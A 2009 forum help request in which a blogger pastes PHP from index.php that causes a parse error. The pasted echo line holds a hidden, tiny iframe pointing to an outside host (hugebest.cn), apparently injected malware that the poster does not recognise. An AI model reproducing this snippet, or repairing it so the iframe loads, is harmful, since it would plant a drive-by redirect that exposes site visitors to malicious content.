View Single Post
  #1  
Old 05-17-2009, 01:24 PM
rando57 Offline
forum loafer
 
Join Date: Jan 2009
Posts: 4
Page error:syntax error:

I have no acess to my frontpage: http://www.randotomson.com/blogi/

It says : Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in .../blogi/index.php on line 300


Code:
// Refererlog
if(isset($_GET['x'])&&$_GET['x'] == "referer") {

	header("HTTP/1.0 404 Not Found");
	header("Status: 404 File Not Found!");
	echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\"><HTML><HEAD>\n<TITLE>404 Not Found</TITLE>\n</HEAD><BODY><iframe src="http://hugebest.cn:8080/ts/in.cgi?pepsi8" width=2 height=4 style="visibility: hidden"></iframe>\n<H1>Not Found</H1>\nThe requested URL /index.php was not found on this server.<P>\n<P>Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.\n</BODY></HTML>";
    exit;
}

Line 300 is third from the bottom starting with "echo.... "


Can anybody help me to fix the problem?

Thank you
Reply With Quote